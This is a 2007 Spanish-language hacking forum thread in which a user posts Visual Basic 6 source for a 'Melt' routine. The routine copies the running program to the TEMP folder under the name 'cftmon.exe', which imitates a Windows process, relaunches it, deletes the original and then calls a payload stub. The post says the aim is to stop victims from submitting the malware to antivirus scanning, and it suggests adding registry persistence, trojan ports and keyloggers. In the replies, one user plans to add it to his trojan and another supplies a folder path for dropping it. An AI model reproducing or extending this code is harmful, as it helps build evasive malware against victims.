elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] How to Melt a file in VB6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Source] How to Melt a file in VB6  (Leído 11,263 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
[Source] How to Melt a file in VB6
« en: 13 Mayo 2007, 12:49 pm »

Bueno, aquí otro de mis mini códigos para hacer "Melt" en VB6, pero antes... ¿que significa "Melt"?

Definición
Se llama "Melt" cuando un usuario ejecuta un archivo y este desaparece (se auto-elimina) después de ejecutarse, esta función es necesaria para evitar que nuestra víctima ejecute 2 veces nuestro malware o evitar que la victima lo envíe a un Antivirus o a virustotal después de ejecutarlo, su estructura es...

1) Ejecuto el archivo (A)
2) El archivo (A) se copia en otro lugar (B)
3) El archivo (A) ejecuta el archivo (B)
4) El archivo (B) borra el archivo (A)
5) El archivo (B) sigue ejecutando el resto de malware...

Como he dicho, esto es ideal para evitar que existan 2 procesos iguales abiertos en el sistema (para evitar que nuestro keylogger sea ejecutado 2 veces, o nuestro troyano intente escuchar 2 veces por el mismo puerto, etc). Así también evitas que la víctima envíe el archivo a un análisis después de ejecutarlo xD



Aquí el código:

Código
  1. Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
  2.  
  3. Sub Main()
  4.    'Obtenemos el nombre de nuestro ejecutable
  5.    MyName = App.EXEName
  6.  
  7.    'Comprobamos si nos llamamos CTFMON
  8.    If LCase(App.EXEName) = "cftmon" Then
  9.        Call Execute
  10.    Else
  11.        Call MeltFile
  12.    End If
  13. End Sub
  14.  
  15. Function Execute()
  16.    'Función que se encarga de borrar el archivo original a partir
  17.    'de su ruta. Al terminar ejecuta el PayLoad
  18.  
  19.    On Error Resume Next
  20.  
  21.    If Not IsEmpty(Command$) Then   'Verificamos si tenemos algo en los argumentos
  22.        While Dir(Command$) <> ""   'Comprobamos si existe el archivo que tenemos en los argumentos
  23.            Kill Command$           '   Si existe... lo borramos
  24.            DoEvents                '   Esperamos un poco
  25.        Wend                        'Bucle
  26.    End If
  27.    Call PayLoad                    'Ejecutamos el resto del Malware
  28. End Function
  29.  
  30. Function MeltFile()
  31.    'Función que copia el propio Malware en la carpeta TEMP del sistema
  32.    'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
  33.    'argumento su propia ruta.
  34.  
  35.    Dim MySelf As String
  36.    MySelf = String$(255, Chr$(0))
  37.  
  38.    GetModuleFileName 0, MySelf, Len(MySelf)        'Devuele la ruta correcta de tu aplicación
  39.  
  40.    FileCopy MySelf, Environ("TMP") & "\cftmon.exe" 'Nos copiamos en "TEMP\cftmon.exe"
  41.    DoEvents                                        'Esperamos...
  42.    Shell Environ("tmp") & "\cftmon.exe " & MySelf  'Ejecutamos "TMP\cftmon.exe" + Ruta de tu aplicación
  43.    End                                             'Finalizamos (importante! xD)
  44. End Function
  45.  
  46. Function PayLoad()
  47.    'Aqui incluimos el resto de código de tu Malware...
  48.    'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
  49.    'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
  50.    'activar el keylogger o lo que quieras programar :P
  51.  
  52.    MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
  53.    End
  54. End Function
  55.  

Si quieres evitar que tu aplicación sea ejecutada 2 veces también puedes crearte un MuteX, pero la función "Melt" hace lo mismo que el MuteX y encima borra el archivo original (para evitar análisis de AV's).

Saludos!! (Espero comentarios!!)

Codigo fuente adjunto al post (solo usuarios registrados)


« Última modificación: 30 Junio 2007, 15:15 pm por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Hans el Topo


Desconectado Desconectado

Mensajes: 1.754


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: [Source] How to Melt a file in VB6
« Respuesta #1 en: 13 Mayo 2007, 12:55 pm »

jajaja muy bueno, no sabía que se llamaba "Melt" xD

Hace tiempo hice algo parecido, el mio movia el archivo a la carpeta que más tiempo llevaba sin modificarse xD




En línea

Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #2 en: 13 Mayo 2007, 15:43 pm »

Muy bueno,para evitar que se ejecute dos veces tu programa no seria mejor en el form_load:
Código:
If app.previnstance=true then
end
end if
Pero para un troyano es muy util para el server.
Saludos.
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] How to Melt a file in VB6
« Respuesta #3 en: 13 Mayo 2007, 16:52 pm »

Ese cñodigo no sirve mucho, me explico:

Código:
If App.PrevInstance = True Then
    End
End If

Esto lo guardo como "hola.exe" y lo ejecuto. Ahora copio "hola.exe" como "adios.exe" y lo ejecuto.

Tendré el hola.exe y el adios.exe ejecutados simultaneamente. Esto se arregla con un MuteX o con Melt
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
satan69


Desconectado Desconectado

Mensajes: 341



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #4 en: 13 Mayo 2007, 17:17 pm »

esta bueno el codigo....    gracias   ;D ;D ;D ;D
En línea

Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #5 en: 13 Mayo 2007, 23:37 pm »

Es cierto ||MadAntrax||,ya decia yo que no seria asi.
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #6 en: 14 Mayo 2007, 01:52 am »

jaja...
yo tb hice uno parecido sin saber q tenia nombre ya... XD

el mio en vez de comprobar q nombre tenia verificaba la ruta... si esta estaba en windows se conectaba... si no se copiaba a windows y lo ejecutaba...
lo de borrar no se me habia ocurrido pero es buena idea tb ;)
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [Source] How to Melt a file in VB6
« Respuesta #7 en: 14 Mayo 2007, 11:26 am »

Muy weno ;)
En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #8 en: 18 Mayo 2007, 23:13 pm »

wenisimo!!!
aora mismo lo pongo en mi troyano!
muy util gracias!!!

alguien sabe como hacer para que en ves que se copie a la carpeta temp, se copie a la de windows??? ai alguna variable en vb q contenga el directorio de windows??? hasta donde yo se, para system32 hai que declarar mucho.. me contaron que para la carpeta de windows no, alguien sabe??
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: [Source] How to Melt a file in VB6
« Respuesta #9 en: 18 Mayo 2007, 23:19 pm »

Código:
MsgBox Environ("windir")

asi me lo paso EON ;)

y funciona
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[FUNCION] Autoit MELT
Scripting
79137913 0 2,040 Último mensaje 10 Diciembre 2013, 14:57 pm
por 79137913
[VBS]Perfect Melt
Scripting
xXSCORPIOXx 7 3,975 Último mensaje 21 Marzo 2014, 01:58 am
por 79137913
[SOURCE] File 2 startup v1.2
.NET (C#, VB.NET, ASP)
Eleкtro 0 2,538 Último mensaje 15 Enero 2015, 01:59 am
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines